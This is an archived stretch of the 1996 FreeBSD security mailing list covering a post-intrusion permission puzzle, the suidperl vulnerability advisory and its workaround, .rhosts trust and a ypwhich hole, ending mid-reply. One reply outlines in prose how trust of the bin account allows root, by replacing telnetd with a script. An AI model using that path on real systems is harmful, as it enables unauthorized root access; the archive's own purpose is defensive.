Look through the user crontab files in /var/cron/tabs/* and look for suspect entries. If you don't find any, you might also want to check for an at job that requeues itself, so look through /var/at/jobs/*. And if you still don't find anything, look for long running processes or cyclically executing processes that eventually do a bunch of chmods at 2 week intervals.

-- 
Sean Kelly
NOAA Forecast Systems Laboratory
kelly@fsl.noaa.gov
Boulder Colorado USA
http://www-sdd.fsl.noaa.gov/~kelly/

From owner-freebsd-security Wed Jun 26 16:26:30 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id QAA02492 for security-outgoing; Wed, 26 Jun 1996 16:26:30 -0700 (PDT)
Received: from dworshak.cs.uidaho.edu (dworshak.cs.uidaho.edu [129.101.100.160]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id QAA02481 for ; Wed, 26 Jun 1996 16:26:28 -0700 (PDT)
Received: from waldrog.cs.uidaho.edu (waldrog.cs.uidaho.edu [129.101.100.23]) by dworshak.cs.uidaho.edu (8.7.5/1.1) with ESMTP id QAA11247; Wed, 26 Jun 1996 16:28:01 -0700 (PDT)
Received: from localhost (localhost [127.0.0.1]) by waldrog.cs.uidaho.edu (8.7.5/1.0) with SMTP id QAA21948; Wed, 26 Jun 1996 16:26:24 -0700 (PDT)
X-Authentication-Warning: waldrog.cs.uidaho.edu: Host localhost [127.0.0.1] didn't use HELO protocol
To: Troy Arie Cobb
cc: security@freebsd.org
Subject: Re: Odd permission changes
In-reply-to: Your message of "Wed, 26 Jun 1996 18:27:58 PDT."
Date: Wed, 26 Jun 1996 16:26:23 PDT
Message-ID: <21946.835831583@waldrog.cs.uidaho.edu>
From: faried nawaz Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Troy Arie Cobb wrote... I have a strange thing that's been happening regularly now, following an incident w/ a cracker-type (who is now long gone). Now, on Fridays, around 2am, all of the owner-execute permissions on all files is removed. This has happened two weeks in a row now, I have accounting active and saw the chmod, but no one was logged in, and the daily/weekly scripts don't have any chmods in them. What about binaries, like `cron' or `at' or `chmod'? Have they been tampered with? Do you run any unusual daemons? Any incorrect crontab/at jobs? What happens when you do `chmod 000 /bin/chmod' (note: be sure to have a copy of chmod from another machine w/ permissions to fix /bin/chmod before you try this!) ? I need to buy a clue, any help? If you find out, please let me/us know. I've never seen that before. From owner-freebsd-security Wed Jun 26 16:48:37 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id QAA03499 for security-outgoing; Wed, 26 Jun 1996 16:48:37 -0700 (PDT) Received: from post.io.org (post.io.org [198.133.36.6]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id QAA03489 for ; Wed, 26 Jun 1996 16:48:32 -0700 (PDT) Received: from zap.io.org (taob@zap.io.org [198.133.36.81]) by post.io.org (8.7.5/8.7.3) with SMTP id TAA07325; Wed, 26 Jun 1996 19:44:20 -0400 (EDT) Date: Wed, 26 Jun 1996 19:45:14 -0400 (EDT) 
From: Brian Tao
To: Thomas Ptacek
cc: FREEBSD-SECURITY-L
Subject: Re: How secure is FreeBSD 2.1 right after install? (fwd)
In-Reply-To: <199606262256.RAA00837@enteract.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

On Wed, 26 Jun 1996, Thomas Ptacek wrote:
>
> 8.7.4's got exploitable problems in it... they're just not public
> knowledge yet. People *are* running around with scripts for it.

It's not public knowledge, yet there are people out there with exploit scripts. I assume this situation came about because the holes haven't been fixed in 8.7.5 yet? If they have, then there is no reason to publicly disseminate the exploits.

-- 
Brian Tao (BT300, taob@io.org, taob@ican.net)
Systems and Network Administrator, Internet Canada Corp.
"Though this be madness, yet there is method in't"

From owner-freebsd-security Wed Jun 26 18:26:55 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id SAA10861 for security-outgoing; Wed, 26 Jun 1996 18:26:55 -0700 (PDT)
Received: from genesis.atrad.adelaide.edu.au (genesis.atrad.adelaide.edu.au [129.127.96.120]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id SAA10854 for ; Wed, 26 Jun 1996 18:26:51 -0700 (PDT)
Received: from msmith@localhost by genesis.atrad.adelaide.edu.au (8.6.12/8.6.9) id KAA08033; Thu, 27 Jun 1996 10:43:13 +0930
From: Michael Smith
Message-Id: <199606270113.KAA08033@genesis.atrad.adelaide.edu.au>
Subject: Re: I need help on this one - please help me track this guy down!
To: vince@mercury.gaianet.net (-Vince-)
Date: Thu, 27 Jun 1996 10:43:12 +0930 (CST)
Cc: security@FreeBSD.ORG, chad@mercury.gaianet.net, jbhunt@mercury.gaianet.n

-Vince- stands accused of saying:
> >
> > Well, *if* that's true, it still wouldn't be setuid root just from the
> > transfer. He'd *still* have to get root some other way to make this
> > binary setuid root.
> >
> > But if he's going to do that, why bother copying a binary over the
> > network -- it would just be easier to just snag a copy of your own
> > /bin/sh and mark it setuid root.
>
> Hmmm, what happens if he tars it first and then sends it over?

Vince, you are, like, _spectacularly_ dim.

Tar is a program. It reads datafiles, and writes new files based on what
it reads. It is not magic. If it reads a tarfile that tells it to create
a setuid root file, it will try to do so.

Note that about half a dozen people have said _very_plainly_ that to
create or make a setuid root file one _must_already_be_root_.

Or am I just wasting my ulcer on you?

> Vince
--
]] Mike Smith, Software Engineer        msmith@atrad.adelaide.edu.au    [[
]] Genesis Software                     genesis@atrad.adelaide.edu.au   [[
]] High-speed data acquisition and      (GSM mobile) 0411-222-496       [[
]] realtime instrument control          (ph/fax) +61-8-267-3039         [[
]] Collector of old Unix hardware.      "Where are your PEZ?" The Tick  [[

From owner-freebsd-security Wed Jun 26 18:32:47 1996
Date: Thu, 27 Jun 1996 03:32:38 +0200 (MDT)
From: Denis Fortin
Reply-To: fortin@acm.org
To: Brian Tao
cc: Thomas Ptacek, FREEBSD-SECURITY-L
Subject: Re: How secure is FreeBSD 2.1 right after install? (fwd)

On Wed, 26 Jun 1996, Brian Tao wrote:
> On Wed, 26 Jun 1996, Thomas Ptacek wrote:
> > 8.7.4's got exploitable problems in it... they're just not public
> > knowledge yet. People *are* running around with scripts for it.
>
> It's not public knowledge, yet there are people out there with
> exploit scripts. I assume this situation came about because the holes
> haven't been fixed in 8.7.5 yet? If they have, then there is no
> reason to publically disseminate the exploits.

8.7.5 is a very minor update over 8.7.4 that gets around a tiny bug that
could cause network connections to hang. If there's a hole in 8.7.4, I
fully expect 8.7.5 to also exhibit it.

Denis, sigh...

PS. What this world needs is a really simple smtpd

From owner-freebsd-security Wed Jun 26 20:21:49 1996
Message-Id: <199606270321.UAA01884@MindBender.HeadCandy.com>
To: -Vince-
cc: "Eric J. Schwertfeger", Mark Murray, hackers@freebsd.org, security@freebsd.org, Chad Shackley, jbhunt
Subject: Re: I need help on this one - please help me track this guy down!
In-reply-to: Your message of Wed, 26 Jun 96 13:55:05 -0700.
Date: Wed, 26 Jun 1996 20:21:02 -0700
From: "Michael L. VanLoon -- HeadCandy.com"

>> > It was a remote login so he had to transfer it over somehow...

>> Well, *if* that's true, it still wouldn't be setuid root just from the
>> transfer. He'd *still* have to get root some other way to make this
>> binary setuid root.

>> But if he's going to do that, why bother copying a binary over the
>> network -- it would just be easier to just snag a copy of your own
>> /bin/sh and mark it setuid root.

> Hmmm, what happens if he tars it first and then sends it over?

Try it. :-) That's the only way to figure all this stuff out...

Seriously, you must be root to create a setuid root file. It doesn't
matter *how* you try to create it.

-----------------------------------------------------------------------------
Michael L. VanLoon                                 michaelv@HeadCandy.com
      --<  Free your mind and your machine -- NetBSD free un*x  >--
    NetBSD working ports: 386+PC, Mac 68k, Amiga, Atari 68k, HP300, Sun3,
        Sun4/4c/4m, DEC MIPS, DEC Alpha, PC532, VAX, MVME68k, arm32...
    NetBSD ports in progress: PICA, others...

   Roll your own Internet access -- Seattle People's Internet cooperative.
             If you're in the Seattle area, ask me how.
-----------------------------------------------------------------------------

From owner-freebsd-security Thu Jun 27 00:14:36 1996
From: guido@gvr.win.tue.nl (Guido van Rooij)
Message-Id: <199606270714.JAA25584@gvr.win.tue.nl>
Subject: Re: CERT Advisory CA-96.12 - Vulnerability in suidperl (fwd)
To: scanner@orion.webspan.net (Scanner)
Date: Thu, 27 Jun 1996 09:14:12 +0200 (MET DST)
Cc: taob@io.org, freebsd-security@freebsd.org

Scanner wrote:
> On Thu, 27 Jun 1996, Guido van Rooij wrote:
>
> > Brian Tao wrote:
> > [There is text before PGP section.]
> > > I believe this applies to perl4 as shipped with all versions of
> > > FreeBSD, as well as the perl5 packages/ports. Does anyone know what
> > > the actual vulnerability is?
> >
> > We know. This bug was first reported by Paul Traina to CERT.
> > Of course we're not going to get into details.
>
> Ok sure fine take all the fun out of it. :-)
>

The fun is not reading how it is done, but finding it ;-)

-Guido

From owner-freebsd-security Thu Jun 27 01:39:25 1996
From: "Hr.Ladavac"
Message-Id: <199606270836.AA158394572@ws2301.gud.siemens.co.at>
Subject: Re: I need help on this one - please help me track this guy down!
To: michaelv@HeadCandy.com (Michael L. VanLoon -- HeadCandy.com)
Date: Thu, 27 Jun 1996 10:36:11 +0200 (MESZ)
Cc: vince@mercury.gaianet.net, ejs@bfd.com, mark@grumble.grondar.za, hackers@FreeBSD.org, security@FreeBSD.org, chad@mercury.gaianet.net, jbhunt@mercury.gaianet.net
In-Reply-To: <199606270321.UAA01884@MindBender.HeadCandy.com> from "Michael L. VanLoon -- HeadCandy.com" at Jun 26, 96 08:21:02 pm

In his e-mail Michael L. VanLoon -- HeadCandy.com wrote:
>
> >> > It was a remote login so he had to transfer it over somehow...
>
> >> Well, *if* that's true, it still wouldn't be setuid root just from the
> >> transfer. He'd *still* have to get root some other way to make this
> >> binary setuid root.
>
> >> But if he's going to do that, why bother copying a binary over the
> >> network -- it would just be easier to just snag a copy of your own
> >> /bin/sh and mark it setuid root.
>
> > Hmmm, what happens if he tars it first and then sends it over?
>
> Try it. :-) That's the only way to figure all this stuff out...
>
> Seriously, you must be root to create a setuid root file. It doesn't
> matter *how* you try to create it.

A five dollar question Vince:

does root have .rhosts in his home directory? What is to be found there?
If he does, throw it away; it's enormously insecure. Similar with
/etc/host.equiv et cetera.

/Marino

From owner-freebsd-security Thu Jun 27 04:40:25 1996
Date: Thu, 27 Jun 1996 13:37:47 +0200
Message-Id: <199606271137.NAA10077@irs.inf.tu-dresden.de>
To: guido@gvr.win.tue.nl (Guido van Rooij)
Cc: freebsd-security@FreeBSD.ORG, bugs@sax.sax.de
In-reply-to: guido@gvr.win.tue.nl's message of Thu, 27 Jun 1996 00:06:49 +0200 (MET DST)
Subject: Re: CERT Advisory CA-96.12 - Vulnerability in suidperl (fwd)
From: hohmuth@inf.tu-dresden.de (Michael Hohmuth)
References: <199606261914.NAA05459@rocky.mt.sri.com> <199606262206.AAA24375@gvr.win.tue.nl>

In article <199606262206.AAA24375@gvr.win.tue.nl> guido@gvr.win.tue.nl (Guido van Rooij) writes:

> Nate Williams wrote:
> > > I believe this applies to perl4 as shipped with all versions of
> > > FreeBSD, as well as the perl5 packages/ports. Does anyone know what
> > > the actual vulnerability is?
> >
> > I don't, but thanks for bringing this up. I was planning on bringing
> > this in but I forgot. I just applied the suggested change to the
> > version of perl in -stable and -current, so it'll be in 2.1.5.
> >
>
> We already were no longer vulnerable. However, the applied fix won't hurt.

When the advisory appeared, I applied the fix (fixsuid4-0.pat) to our
2.1.0 system. However, afterwards our PPP login script ceased to work,
so I had to back out the patch. The login script (used as the login
shell for our PPP accounts) just said:

Can't open perl script "/dev/fd/3//usr/local/sbin/ppplogin": Not a directory

I'll append a copy of the script below for those interested.

Can anyone shed some light on what was going on?

I understand from Guido's post that 2.1.0 is not vulnerable even if the
Perl4 patch has not been applied. Is this correct?

If this is the case, I suggest backing out the patch from -stable and
-current as well.

Thanks in advance,
Michael
--
Email: hohmuth@inf.tu-dresden.de
WWW: http://www.inf.tu-dresden.de/~mh1/

------------------------------------------------------------------------------
#!/usr/bin/suidperl
#
#
# login script for PPP logins
#
$ENV{'PATH'} = "/bin:/usr/bin:/sbin:/usr/sbin";
#
# Q: how to check if the fork succeeded?
# A: ask Larry Wall :-/
#
# "|-" forks: the parent gets a pipe to the child, the child execs logger
open(LOG, "|-") || exec "logger", "-p", "local0.debug";

if(open(SLHOST, "/etc/sliphome/slip.hosts") == 0) {
    print LOG "Cannot open /etc/sliphome/slip.hosts\n";
    close LOG;
    exit 1;
}

if(!defined($ENV{'USER'})) {
    print LOG "PPP login with unknown \${USER}\n";
    close LOG;
    exit 1;
}

$user = $ENV{'USER'};
$sluser = $user;
$sluser =~ s/^pp/sl/;

# scan slip.hosts line by line, skipping blank and comment lines,
# until the entry for this user's slip name is found
while(<SLHOST>) {
    next if /^([ \t]*\#.*)?$/;
    ($login,$local,$remote,$mask) = split;
    last if $login eq $sluser;
}
close(SLHOST);

if($local eq "" || $remote eq "" || $mask eq "" || $login ne $sluser) {
    print LOG "PPP login for user $user, required information not found\n";
    close LOG;
    exit 1;
}

print LOG "$user ($sluser/$login) attached, $local -> $remote, mask $mask\n";

$local = &convaddr($local);
$remote = &convaddr($remote);
$mask = &convaddr($mask);

print LOG "$user attached, $local -> $remote, mask $mask\n";
close LOG;

exec "pppd", "crtscts", "modem", "$local:$remote", "netmask", "$mask";

# should not be reached at all
open(LOG, "|-") || exec "logger", "-p", "local0.debug";
print LOG "exec of pppd failed for user $user\n";
close(LOG);
exit 2;

#
# convert address to dotted quad
#
sub convaddr {
    local($input) = @_;
    local($ip,$a,$b,$c,$d);

    # return if already dotted quad
    return $input if $input =~ /^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$/;

    if($input =~ /^0[xX]/) {
        $ip = oct($input);
        return sprintf("%d.%d.%d.%d", ($ip >> 24) & 0xff, ($ip >> 16) & 0xff,
                       ($ip >> 8) & 0xff, $ip & 0xff);
    }

    # neither dotted quad, nor hex number, ask the name server
    ($name,$aliases,$addrtype,$length,$addr) = gethostbyname($input);
    ($a,$b,$c,$d) = unpack("C4",$addr);
    return "$a.$b.$c.$d";
}

From owner-freebsd-security Thu Jun 27 05:04:18 1996
From: guido@gvr.win.tue.nl (Guido van Rooij)
Message-Id: <199606271203.OAA25884@gvr.win.tue.nl>
Subject: Re: CERT Advisory CA-96.12 - Vulnerability in suidperl (fwd)
To: hohmuth@inf.tu-dresden.de (Michael Hohmuth)
Date: Thu, 27 Jun 1996 14:03:17 +0200 (MET DST)
Cc: freebsd-security@FreeBSD.ORG, bugs@sax.sax.de
In-Reply-To: <199606271137.NAA10077@irs.inf.tu-dresden.de> from Michael Hohmuth at "Jun 27, 96 01:37:47 pm"

> Can anyone shed some light on what was going on?
>
> I understand from Guido's post that 2.1.0 is not vulnerable even if
> the Perl4 patch has not been applied. Is this correct?
>
> If this is the case, I suggest backing out the patch from -stable and
> -current as well.
>

2.1.0 IS vulnerable!!!!!
2.1.0-current and stable are not vulnerable anymore. That is what I was
trying to say. So all official releases that had working suidperl *are*
vulnerable.

As soon as Paul is back from his trip I'm sure he will post an
appropriate advisory.

-Guido

From owner-freebsd-security Thu Jun 27 07:39:35 1996
From: hal@snitt.com (Hal Snyder)
To: Troy Arie Cobb
Cc: security@freebsd.org
Subject: Re: Odd permission changes
Date: Thu, 27 Jun 1996 14:39:34 GMT
Organization: Siemens Nixdorf Transportation Technologies
Message-ID: <31d29c6e.3939041@vogon.trans.sni-usa.com>

On Wed, 26 Jun 1996 18:27:58 -0400 (EDT), you wrote:

> I have a strange thing that's been happening regularly now,
> following an incident w/ a cracker-type (who is now long
> gone). Now, on Fridays, around 2am, all of the owner-execute
> permissions on all files are removed. This has happened two
> weeks in a row now, I have accounting active and saw the
> chmod, but no one was logged in, and the daily/weekly scripts
> don't have any chmods in them.

If searches of cron and at tables don't help, I'd hack the kernel to
track chmod calls to syslog, including timestamp, real userid, and
program name.

From owner-freebsd-security Thu Jun 27 11:34:17 1996
From: Terry Lambert
Message-Id: <199606271830.LAA05468@phaeton.artisoft.com>
Subject: Re: I need help on this one - please help me track this guy down!
To: lada@ws2301.gud.siemens.co.at (Hr.Ladavac)
Date: Thu, 27 Jun 1996 11:30:17 -0700 (MST)
Cc: michaelv@HeadCandy.com, vince@mercury.gaianet.net, ejs@bfd.com, mark@grumble.grondar.za, hackers@FreeBSD.org, security@FreeBSD.org, chad@mercury.gaianet.net, jbhunt@mercury.gaianet.net
In-Reply-To: <199606270836.AA158394572@ws2301.gud.siemens.co.at> from "Hr.Ladavac" at Jun 27, 96 10:36:11 am

> > Seriously, you must be root to create a setuid root file. It doesn't
> > matter *how* you try to create it.
>
> A five dollar question Vince:
>
> does root have .rhosts in his home directory? What is to be found there?
> If he does, throw it away; it's enormously insecure. Similar with
> /etc/host.equiv et cetera.

man ruserok

The authentication for vouchsafe protocols (rcmd/rsh based protocols)
*specifically* ignores hosts.equiv and hosts.lpd for root. If root
does not have a .rhosts, then it is secure from vouchsafe attack this
way.

Terry Lambert
terry@lambert.org
---
Any opinions in this posting are my own and not those of my present
or previous employers.

From owner-freebsd-security Thu Jun 27 14:00:40 1996
From: Cy Schubert - ITSD Open Systems Group
Message-Id: <199606272100.OAA14831@passer.osg.gov.bc.ca>
Reply-to: cschuber@orca.gov.bc.ca
To: freebsd-security@freebsd.org
Subject: Ypwhich Hole
Date: Thu, 27 Jun 96 14:00:32 -0700

There's been a little discussion about a ypwhich hole under FreeBSD 2.1.0R.
In order to plug the hole as quickly and as easily as possible, for the
moment, would replacing the 2.1.0 version of ypwhich with the one in
current fix the problem or does the problem exist in a library or in the
kernel?

Regards,                       Phone:    (604)389-3827
Cy Schubert                    OV/VM:    BCSC02(CSCHUBER)
Open Systems Support           BITNET:   CSCHUBER@BCSC02.BITNET
ITSD                           Internet: cschuber@uumail.gov.bc.ca
                                         cschuber@bcsc02.gov.bc.ca

"Quit spooling around, JES do it."

From owner-freebsd-security Thu Jun 27 14:17:20 1996
Date: Thu, 27 Jun 1996 17:18:09 -0400 (EDT)
From: Douglas Song
To: freebsd-security@freebsd.org
Subject: pluggable authentication modules

Is any work being done on implementing PAM (pluggable authentication
modules) for FreeBSD? I already know of some people in the Linux camp
that are working on it. I would like to help code this, if anyone's
interested.

More information on PAM is available from the OSF RFC 86.0, or at
http://fangorn.ncsa.uiuc.edu/faq/motif.faq.034.html

---
Douglas Song, one angry monkey. dugsong@monkey.org

From owner-freebsd-security Thu Jun 27 16:02:59 1996
Date: Thu, 27 Jun 1996 16:02:10 -0700 (PDT)
From: Steve Reid
To: Guido van Rooij
cc: freebsd-security@FreeBSD.ORG
Subject: Re: CERT Advisory CA-96.12 - Vulnerability in suidperl (fwd)
In-Reply-To: <199606271203.OAA25884@gvr.win.tue.nl>

> 2.1.0 IS vulnerable!!!!!
> 2.1.0-current and stable are not vulnerable anymore.

I'm using FreeBSD 2.1.0-RELEASE. Is it sufficient to remove the suid bit
from the suidperl binaries? Or do I also have to search for scripts with
the suid bit? I don't currently need suid perl scripts.

=====================================================================
| Steve Reid - SysAdmin & Pres, EDM Web (http://www.edmweb.com/)   |
| Email: steve@edmweb.com   Home Page: http://www.edmweb.com/steve/ |
| PGP (2048/9F317269) Fingerprint: 11C89D1CD67287E68C09EC52443F8830 |
|          -- Disclaimer: JMHO, YMMV, TANSTAAFL, IANAL. --          |
===================================================================:)

From owner-freebsd-security Thu Jun 27 16:43:03 1996
Date: Thu, 27 Jun 1996 16:46:11 -0700 (PDT)
From: Tom Samplonius
To: cschuber@orca.gov.bc.ca
cc: freebsd-security@freebsd.org
Subject: Re: Ypwhich Hole
In-Reply-To: <199606272100.OAA14831@passer.osg.gov.bc.ca>

On Thu, 27 Jun 1996, Cy Schubert - ITSD Open Systems Group wrote:

> There's been a little discussion about a ypwhich hole under FreeBSD 2.1.0R. In
> order to plug the hole as quickly and as easily as possible, for the moment,
> would replacing the 2.1.0 version of ypwhich with the one in current fix the
> problem or does the problem exist in a library or in the kernel?
>
>
> Regards,                       Phone:    (604)389-3827
> Cy Schubert                    OV/VM:    BCSC02(CSCHUBER)
> Open Systems Support           BITNET:   CSCHUBER@BCSC02.BITNET
> ITSD                           Internet: cschuber@uumail.gov.bc.ca
>                                          cschuber@bcsc02.gov.bc.ca
>
> "Quit spooling around, JES do it."
>
>

As far as I know, this problem has never been announced on this list,
nor has a security advisory been issued.

current's yp code has extensive changes. ypwhich may not compile.

Tom

From owner-freebsd-security Thu Jun 27 16:46:10 1996
Date: Thu, 27 Jun 1996 16:45:45 -0700
From: Michael Constant
Message-Id: <199606272345.QAA28812@maelstrom.Berkeley.EDU>
To: guido@gvr.win.tue.nl, root@edmweb.com
Subject: Re: CERT Advisory CA-96.12 - Vulnerability in suidperl (fwd)
Cc: freebsd-security@FreeBSD.ORG

> I'm using FreeBSD 2.1.0-RELEASE. Is it sufficient to remove the suid bit
> from the suidperl binaries? Or do I also have to search for scripts with
> the suid bit?

Removing the setuid bit from the binaries is all you need. The kernel
ignores the setuid bit on scripts -- that's why suidperl is necessary
in the first place.

- Michael Constant

From owner-freebsd-security Thu Jun 27 22:41:46 1996
From: Ollivier Robert
Message-Id: <199606272337.BAA22624@keltia.freenix.fr>
Subject: Re: CERT Advisory CA-96.12 - Vulnerability in suidperl (fwd)
To: root@edmweb.com (Steve Reid)
Date: Fri, 28 Jun 1996 01:37:20 +0200 (MET DST)
Cc: guido@gvr.win.tue.nl, freebsd-security@FreeBSD.ORG
In-Reply-To: from Steve Reid at "Jun 27, 96 04:02:10 pm"
X-Operating-System: FreeBSD 2.2-CURRENT ctm#2111

It seems that Steve Reid said:
> I'm using FreeBSD 2.1.0-RELEASE. Is it sufficient to remove the suid bit
> from the suidperl binaries? Or do I also have to search for scripts with
> the suid bit?

Removing the setuid of suidperl is enough. Setuid scripts are not valid
and the setuid bit is there only for suidperl.
--
Ollivier ROBERT -=- The daemon is FREE! -=- roberto@keltia.freenix.fr
FreeBSD keltia.freenix.fr 2.2-CURRENT #11: Thu Jun 13 11:01:47 MET DST 1996

From owner-freebsd-security Fri Jun 28 01:27:14 1996
Message-Id: <199606280827.BAA18084@freefall.freebsd.org>
To: freebsd-security-notifications@freebsd.org, freebsd-announce@freebsd.org
Cc: freebsd-security@freebsd.org, first-teams@first.org
From: FreeBSD Security Officer Reply-To: security-officer@freebsd.org Subject: FreeBSD Security Advisory: FreeBSD-SA-96:12.perl Date: Fri, 28 Jun 1996 01:22:00 -0700 (PDT) Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk -----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-96:12 Security Advisory FreeBSD, Inc. Topic: security compromise from perl (suidperl) utility Category: core and ports Module: perl Announced: 1996-06-28 Affects: FreeBSD 2.0, 2.0.5, 2.1, 2.1-stable, and 2.2-current Corrected: 2.1-stable and 2.2-current as of 1996-06-03 FreeBSD only: no Patches: ftp://freebsd.org/pub/CERT/patches/SA-96:12/ ============================================================================= I. Background FreeBSD ships perl version 4 as part of the base level system, in addition, a port for perl version 5 is also provided with a similar vulnerability. The vulnerability is specific to the suidperl flavors of perl installed on the system. This problem is present in all source code and binary distributions of FreeBSD version 2.0.5 and later released before 1996-05-21. This problem is not present in FreeBSD 2.0 and earlier versions of FreeBSD. II. Problem Description The authors of perl provide a "suidperl" program for proper processing of setuid perl scripts on systems where race conditions where setuid scripts could be exploited to gain unauthorized access. FreeBSD installs this suidperl program (and a link) as part of the standard installation. However, privilege processing done by this program does not take into account recent functionality extensions in the seteuid/setegid system calls. III. Impact This vulnerability can only be exploited by users with a valid account on the local system to easily obtain superuser access. This vulnerability is present on all systems with the _POSIX_SAVED_IDS functionality extension where suidperl has been installed. IV. 
Workaround One may simply disable the setuid bit on all copies of the setuid version of perl. This will close the vulnerability but render inoperable setuid perl scripts. No software currently shipping as part of FreeBSD relies on this functionality so the impact is only to third party software. As root, execute the commands: # chmod 111 /usr/bin/suidperl # chmod 111 /usr/bin/sperl4.036 In addition, if you have installed the perl5 port: # chmod 111 /usr/local/bin/suidperl # chmod 111 /usr/local/bin/sperl5.001 then verify that the setuid permissions of the files have been removed. The permissions array should read "-r-xr-xr-x" as shown here: # ls -l /usr/bin/s*perl* ---x--x--x 2 root bin 307200 Jun 1 17:16 /usr/bin/sperl4.036 ---x--x--x 2 root bin 307200 Jun 1 17:16 /usr/bin/suidperl and for the perl5 port: # ls -l /usr/local/bin/s*perl* ---x--x--x 2 root bin 397312 Jan 22 15:15 /usr/local/bin/sperl5.001 ---x--x--x 2 root bin 397312 Jan 22 15:15 /usr/local/bin/suidperl V. Solution *NOTE* A patch for perl is available directly from Larry Wall (the author of perl) which solves this vulnerability in a different fashion than the FreeBSD patches. You may apply either the FreeBSD patches, or Larry's patches, or both. The patches solve the problem via two different mechanisms. Patches are available which eliminate this vulnerability. The following patch should be applied to the system sources and suidperl should be rebuilt and reinstalled. Apply the patch, then: # cd /usr/src/gnu/usr.bin/perl/sperl # make depend # make all # make install A similar patch is also available for the perl5 port. Apply the following patch by moving it into the patch directory for the port distribution and rebuilding and installing perl5: # cd /usr/ports/lang/perl5 # cp /patch-a[ab] patches # make all # make install NOTE: These patches do NOT solve the vulnerability for FreeBSD 2.0 or 2.0.5. These only solve the problem for 2.1 and later. 
     Patches specific to FreeBSD 2.0 and 2.0.5 are available at the URL
     listed at the top of this file.

=============================================================================
FreeBSD, Inc.

Web Site:                       http://www.freebsd.org/
Confidential contacts:          security-officer@freebsd.org
PGP Key:                        ftp://freebsd.org/pub/CERT/public_key.asc
Security notifications:         security-notifications@freebsd.org
Security public discussion:     security@freebsd.org

Notice: Any patches in this document may not apply cleanly due to
        modifications caused by digital signature or mailer software.
        Please reference the URL listed at the top of this document
        for original copies of all patches if necessary.
=============================================================================

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3ia
Charset: noconv

iQCVAwUBMdOTfFUuHi5z0oilAQEVkAP/cVHgqsW4GNpShs4RDQYvAphA31vTNiE8
vrfyjpA1GQET/KycQe0xdQWaQ7FF6FwG5ieahHFypqFN2Ze8VW10EuWN/EFhfjh5
vFnCqOW5r84DraP3ttkdR6WKyQXDwt61QBGiO7FYa03Kz29v3n9TO7W0LS+pAhB1
cZZwEwUN318=
=M6FK
-----END PGP SIGNATURE-----

From owner-freebsd-security Fri Jun 28 17:41:12 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id RAA19413 for security-outgoing; Fri, 28 Jun 1996 17:41:12 -0700 (PDT)
Received: from kdat.calpoly.edu (kdat.csc.calpoly.edu [129.65.54.101]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id RAA19349 for ; Fri, 28 Jun 1996 17:39:48 -0700 (PDT)
Received: (from nlawson@localhost) by kdat.calpoly.edu (8.6.12/N8) id RAA00458; Fri, 28 Jun 1996 17:38:58 -0700
From: Nathan Lawson
Message-Id: <199606290038.RAA00458@kdat.calpoly.edu>
Subject: Re: I need help on this one - please help me track this guy down!
To: terry@lambert.org (Terry Lambert)
Date: Fri, 28 Jun 1996 17:38:57 -0700 (PDT)
In-Reply-To: <199606271830.LAA05468@phaeton.artisoft.com> from "Terry Lambert" at Jun 27, 96 11:30:17 am
X-Mailer: ELM [version 2.4 PL23]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

> > > Seriously, you must be root to create a setuid root file.  It doesn't
> > > matter *how* you try to create it.
> >
> > A five dollar question Vince:
> >
> > does root have .rhosts in his home directory?  What is to be found there?
> > If he does, throw it away; it's enormously insecure.  Similar with
> > /etc/host.equiv et cetera.
>
> man ruserok
>
> The authentication for vouchsafe protocols (rcmd/rsh based protocols)
> *specifically* ignores hosts.equiv and hosts.lpd for root.  If root
> does not have a .rhosts, then it is secure from vouchsafe attack this
> way.

Nice try, Terry, but since /bin and /usr/bin and all the binaries on the
system are owned by bin, a hosts.equiv might as well allow root access.
I can su to bin on my host, rsh over to victim, replace
/usr/libexec/telnetd with a script, telnet to localhost, and have my
script run as root.

As I have said many times before, this is a vulnerable path to allowing
normal users (in this case bin) more privileges than necessary.  All
binaries run as root MUST be owned by root.  Any other protection is
inadequate.

-- 
Nate Lawson                "There are a thousand hacking at the branches of
CPE Senior                  evil to one who is striking at the root."
CSL Admin                   -- Henry David Thoreau, 'Walden', 1854

From owner-freebsd-security Sat Jun 29 08:16:29 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id IAA08214 for security-outgoing; Sat, 29 Jun 1996 08:16:29 -0700 (PDT)
Received: from mole.mole.org (marmot.mole.org [204.216.57.191]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id IAA08092 for ; Sat, 29 Jun 1996 08:15:05 -0700 (PDT)
Received: (from mail@localhost) by mole.mole.org (8.6.12/8.6.12) id PAA00344 for ; Sat, 29 Jun 1996 15:15:05 GMT
Received: from meerkat.mole.org(206.197.192.110) by mole.mole.org via smap (V1.3) id sma000339; Sat Jun 29 15:14:41 1996
Received: (from mrm@localhost) by meerkat.mole.org (8.6.11/8.6.9) id HAA27966; Sat, 29 Jun 1996 07:39:27 -0700
Date: Sat, 29 Jun 1996 07:39:27 -0700
From: "M.R.Murphy"
Message-Id: <199606291439.HAA27966@meerkat.mole.org>
To: nlawson@kdat.csc.calpoly.edu, terry@lambert.org
Subject: Re: I need help on this one - please help me track this guy down!
Cc: freebsd-security@freefall.freebsd.org
Sender: owner-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

> Nice try, Terry, but since /bin and /usr/bin and all the binaries on the
